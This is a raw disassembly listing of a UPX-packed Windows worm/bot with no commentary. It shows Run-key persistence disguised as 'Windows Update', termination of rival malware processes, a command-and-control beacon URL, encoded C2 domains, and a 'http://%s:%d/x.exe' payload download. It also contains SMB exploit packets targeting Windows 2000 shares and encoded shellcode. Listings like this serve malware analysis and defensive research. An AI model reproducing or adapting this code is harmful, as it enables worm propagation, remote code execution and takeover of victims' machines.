call dword_309010CC ; ExitThread
xor eax, eax
leave
retn 4
sub_309025B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090267B proc near ; CODE XREF: UPX0:30902749�p
; UPX0:loc_309027AF�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_30901FB1
push eax
call dword_30901158 ; inet_ntoa
mov esi, dword_30901068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpyA
push dword_30904FDC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_30901118 ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_309042F2
call esi ; lstrcpyA
push offset byte_309042F0
call dword_30901084 ; lstrlenA
mov byte_309042F0[eax], 0DFh
pop esi
leave
retn
sub_3090267B endp
; ---------------------------------------------------------------------------
loc_309026D7: ; DATA XREF: sub_3090235D+124�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_30904FE4, ebx
call sub_30901FF0
mov esi, dword_30901094
mov edi, 1388h
test eax, eax
jnz short loc_30902705
loc_309026F9: ; CODE XREF: UPX0:30902703�j
push edi
call esi ; Sleep
call sub_30901FF0
test eax, eax
jz short loc_309026F9
loc_30902705: ; CODE XREF: UPX0:309026F7�j
lea eax, [esp+14h]
push ebx
push eax
call dword_3090112C ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_30904FE8, ebx
pop ebp
mov word_30904FEC, 96h
jz short loc_30902742
mov dword_30904FE8, 1
mov ebp, 15Eh
mov word_30904FEC, 14h
loc_30902742: ; CODE XREF: UPX0:30902728�j
call sub_30901FB1
mov ebx, eax
call sub_3090267B
cmp ebx, 100007Fh
jz short loc_30902763
push ebx
push offset sub_309024C8
call sub_30901F0A
pop ecx
pop ecx
loc_30902763: ; CODE XREF: UPX0:30902754�j
mov dword ptr [esp+10h], 4
loc_3090276B: ; CODE XREF: UPX0:3090277C�j
push ebx
push offset sub_3090252C
call sub_30901F0A
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_3090276B
test ebp, ebp
jle short loc_30902793
loc_30902782: ; CODE XREF: UPX0:30902791�j
push 0
push offset sub_309025B4
call sub_30901F0A
pop ecx
dec ebp
pop ecx
jnz short loc_30902782
loc_30902793: ; CODE XREF: UPX0:30902780�j
; UPX0:3090279F�j ...
call sub_30901FF0
test eax, eax
jz short loc_309027A1
push edi
call esi ; Sleep
jmp short loc_30902793
; ---------------------------------------------------------------------------
loc_309027A1: ; CODE XREF: UPX0:3090279A�j
; UPX0:309027AD�j
call sub_30901FF0
test eax, eax
jnz short loc_309027AF
push edi
call esi ; Sleep
jmp short loc_309027A1
; ---------------------------------------------------------------------------
loc_309027AF: ; CODE XREF: UPX0:309027A8�j
call sub_3090267B
jmp short loc_30902793
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309027B6 proc near ; CODE XREF: sub_3090294F+8C�p
; sub_30902AC9+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3090100C ; RegOpenKeyExA
test eax, eax
jnz short loc_309027E9
push [ebp+arg_8]
push [ebp+arg_4]
call dword_30901010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_30901014 ; RegCloseKey
loc_309027E9: ; CODE XREF: sub_309027B6+1C�j
pop ebp
retn
sub_309027B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309027EB proc near ; CODE XREF: sub_3090216F+33�p
; sub_3090294F+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3090100C ; RegOpenKeyExA
test eax, eax
jz short loc_30902817
push 1
pop eax
jmp short loc_30902841
; ---------------------------------------------------------------------------
loc_30902817: ; CODE XREF: sub_309027EB+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_30901008 ; RegQueryValueExA
test eax, eax
jz short loc_30902836
push 2
pop esi
loc_30902836: ; CODE XREF: sub_309027EB+46�j
push [ebp+arg_10]
call dword_30901014 ; RegCloseKey
mov eax, esi
loc_30902841: ; CODE XREF: sub_309027EB+2A�j
pop esi
leave
retn
sub_309027EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902844 proc near ; CODE XREF: sub_309029FD+96�p
; sub_30902AC9+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_30901000 ; RegCreateKeyExA
test eax, eax
jz short loc_3090286D
push 1
pop eax
jmp short loc_30902894
; ---------------------------------------------------------------------------
loc_3090286D: ; CODE XREF: sub_30902844+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_30901004 ; RegSetValueExA
test eax, eax
jz short loc_30902889
push 2
pop esi
loc_30902889: ; CODE XREF: sub_30902844+40�j
push [ebp+arg_4]
call dword_30901014 ; RegCloseKey
mov eax, esi
loc_30902894: ; CODE XREF: sub_30902844+27�j
pop esi
pop ebp
retn
sub_30902844 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902897 proc near ; CODE XREF: sub_3090294F+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_30901084 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_3090294B
loc_309028B7: ; CODE XREF: sub_30902897+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_309028C0
dec esi
jns short loc_309028B7
loc_309028C0: ; CODE XREF: sub_30902897+24�j
push 0
push 2
call sub_30902C8C ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_3090294B
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_30902C36 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_30902C86 ; Process32First
test eax, eax
jz short loc_3090294B
lea esi, [esi+ebx+1]
loc_30902908: ; CODE XREF: sub_30902897+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_30901100 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_30902938
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_309010AC ; OpenProcess
push 0
push eax
call dword_30901060 ; TerminateProcess
loc_30902938: ; CODE XREF: sub_30902897+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_30902C80 ; Process32Next
test eax, eax
jnz short loc_30902908
loc_3090294B: ; CODE XREF: sub_30902897+1A�j
; sub_30902897+38�j ...
pop esi
pop ebx
leave
retn
sub_30902897 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090294F proc near ; CODE XREF: UPX0:30902326�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_309029B8: ; CODE XREF: sub_3090294F+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_309027EB
add esp, 14h
test eax, eax
jnz short loc_309029EF
push ebx
push edi
push esi
call sub_309027B6
lea eax, [ebp+var_138]
push eax
call sub_30902897
add esp, 10h
loc_309029EF: ; CODE XREF: sub_3090294F+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_309029B8
pop edi
pop esi
pop ebx
leave
retn
sub_3090294F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309029FD proc near ; CODE XREF: sub_30902AC9+D1�p
; sub_30902AC9+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_30902A12
push [ebp+arg_0]
call dword_309010E0 ; DeleteFileA
loc_30902A12: ; CODE XREF: sub_309029FD+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_3090108C ; GetSystemDirectoryA
test eax, eax
jz locret_30902AC7
push esi
call dword_309010F8 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_30901F2B
mov esi, dword_30901088
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_30904228
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push offset dword_30904230
push eax
call esi ; lstrcatA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_30901050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_30901084 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_30902844
add esp, 14h
push dword_30904FD4
call dword_3090107C ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_30901054 ; WinExec
push 1F4h
call dword_30901094 ; Sleep
push 0
call dword_309010D8 ; ExitProcess
pop esi
locret_30902AC7: ; CODE XREF: sub_309029FD+23�j
leave
retn
sub_309029FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902AC9 proc near ; CODE XREF: UPX0:3090232B�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_30901048 ; GetModuleFileNameA
test eax, eax
jz loc_30902C02
and dword_30904FF0, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_309027EB
add esp, 14h
test eax, eax
jz short loc_30902B4F
call dword_309010F8 ; rand
push 0Ah
mov ebx, offset aDfashnzdsdl ; "dfashnzdsdl"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_30901F2B
pop ecx
pop ecx
push ebx
call dword_30901084 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_30902844
add esp, 14h
jmp short loc_30902B5E
; ---------------------------------------------------------------------------
loc_30902B4F: ; CODE XREF: sub_30902AC9+4D�j
lea eax, [ebp+var_20]
push eax
push offset aDfashnzdsdl ; "dfashnzdsdl"
call dword_30901068 ; lstrcpyA
loc_30902B5E: ; CODE XREF: sub_30902AC9+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_309027EB
add esp, 14h
test eax, eax
jz short loc_30902BA4
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_30902844
lea eax, [ebp+var_84]
push eax
push 0
call sub_309029FD
add esp, 1Ch
jmp short loc_30902C02
; ---------------------------------------------------------------------------
loc_30902BA4: ; CODE XREF: sub_30902AC9+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3090104C ; lstrcmpiA
test eax, eax
jnz short loc_30902BED
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_309027EB
add esp, 14h
test eax, eax
jnz short loc_30902C02
push ebx
push edi
push esi
mov dword_30904FF0, 1
call sub_309027B6
add esp, 0Ch
jmp short loc_30902C02
; ---------------------------------------------------------------------------
loc_30902BED: ; CODE XREF: sub_30902AC9+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_309029FD
pop ecx
pop ecx
loc_30902C02: ; CODE XREF: sub_30902AC9+1F�j
; sub_30902AC9+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_30902AC9 endp
; =============== S U B R O U T I N E =======================================
sub_30902C07 proc near ; CODE XREF: sub_309011A0+CA�p
; sub_309015C7+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_30901044 ; VirtualAlloc
retn
sub_30902C07 endp
; =============== S U B R O U T I N E =======================================
sub_30902C1B proc near ; CODE XREF: sub_309011A0+10B�p
; sub_309015C7+BD�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_30901040 ; VirtualFree
retn
sub_30902C1B endp
; ---------------------------------------------------------------------------
align 10h
loc_30902C30: ; DATA XREF: sub_30901422+A�o
; sub_3090235D+A�o
jmp dword ptr loc_309010FC
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902C36 proc near ; CODE XREF: sub_309017B9+128�p
; sub_309017B9+134�p ...
jmp dword_309010F4
sub_30902C36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902C3C proc near ; CODE XREF: sub_309017B9+9C�p
; sub_309017B9+C5�p ...
jmp dword_309010F0
sub_30902C3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902C42 proc near ; CODE XREF: sub_309017B9+93�p
; sub_309017B9+B2�p ...
jmp dword_309010EC
sub_30902C42 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_30902C50 proc near ; CODE XREF: sub_309017B9+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_30902C70
loc_30902C5C: ; CODE XREF: sub_30902C50+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_30902C5C
loc_30902C70: ; CODE XREF: sub_30902C50+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_30902C50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902C80 proc near ; CODE XREF: sub_30902897+AB�p
jmp dword_30901064
sub_30902C80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902C86 proc near ; CODE XREF: sub_30902897+64�p
jmp dword_3090105C
sub_30902C86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902C8C proc near ; CODE XREF: sub_30902897+2D�p
jmp dword_30901058
sub_30902C8C endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 4DBh dup(0)
dword_30904000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_30901422+112�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_309015C7+84�o
align 10h
byte_30904080 db 1 ; DATA XREF: sub_3090169C+5�r
off_30904081 dd offset dword_3090421C ; DATA XREF: sub_3090169C+D�r
db 1, 0Ch, 42h
db 90h
db 30h, 1, 0FCh
dd 1309041h, 309041ECh, 9041D800h, 41C80130h, 0B8013090h
dd 309041h, 309041ACh, 9041A001h, 41900130h, 80003090h
dd 1309041h, 30904174h, 90416801h, 415C0130h, 54013090h
dd 1309041h, 30904144h, 90413401h, 41200130h, 10013090h
dd 1309041h, 30904108h, 9040FC01h, 40F00130h, 3090h, 68746566h
dd 2E647261h, 7A6962h, 6B636168h, 2E737265h, 766Ch, 2E767663h
dd 7572h, 2E777777h, 6C646572h, 2E656E69h, 7572h, 69766F6Ch
dd 646F676Eh, 736F682Eh, 6B732E74h, 0
dd 656C6966h, 72616573h, 722E6863h, 75h, 646C6F67h, 61736E65h
dd 722E646Eh, 75h, 6B637566h, 75722Eh, 6F646170h, 2E696B6Eh
dd 67726Fh, 6A6F7274h, 722E6E61h, 75h, 63657361h, 2E616B68h
dd 7572h, 7473616Dh, 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 722E7A61h
dd 75h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dd 72617778h, 6A632E65h, 656E2E62h, 74h
dword_3090421C dd 617A616Dh, 616B6166h, 75722Ehdword_30904228 dd 6578652Eh, 0 ; sub_30902036+55�o ...
dword_30904230 dd 5Ch ; sub_309029FD+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_309011A0+13�o
align 4
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_30901316+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_30901316+C�o
align 10h
aZer0 db 'zer0',0 ; DATA XREF: sub_30901422+34�o
align 4
aHttpS db 'http://%s',0 ; DATA XREF: sub_309015C7+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=15&cnt=%s',0
; DATA XREF: sub_309015C7+57�o
align 10h
byte_309042F0 db 0EBh ; DATA XREF: sub_309017B9+24E�o
; sub_309017B9+260�o ...
db 58h
word_309042F2 dw 7468h ; DATA XREF: sub_3090267B+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999ACh, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_309045B8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_309017B9+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_30904644 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_309046F0 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_309047D0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_309017B9+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_30904834 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_309048A0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_30904944 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_309049C4 dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_30904A58 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_30904AC4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_30904B38 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_30904BF6 dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_30904C30 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_309017B9+41B�o
; sub_309017B9+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_30904CA8: ; DATA XREF: sub_309017B9+44A�o
jmp short loc_30904CB0
; ---------------------------------------------------------------------------
jmp short loc_30904CB2
; ---------------------------------------------------------------------------
align 10h
loc_30904CB0: ; CODE XREF: UPX0:loc_30904CA8�j
; DATA XREF: sub_309017B9+5C�o
pop esp
pop esp
loc_30904CB2: ; CODE XREF: UPX0:30904CAA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_30904CBC dd 1CEC8166h dword_30904CC0 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_30901D20+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_30901D20+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_30901D20+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_30901D20+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_30901D20+8�o
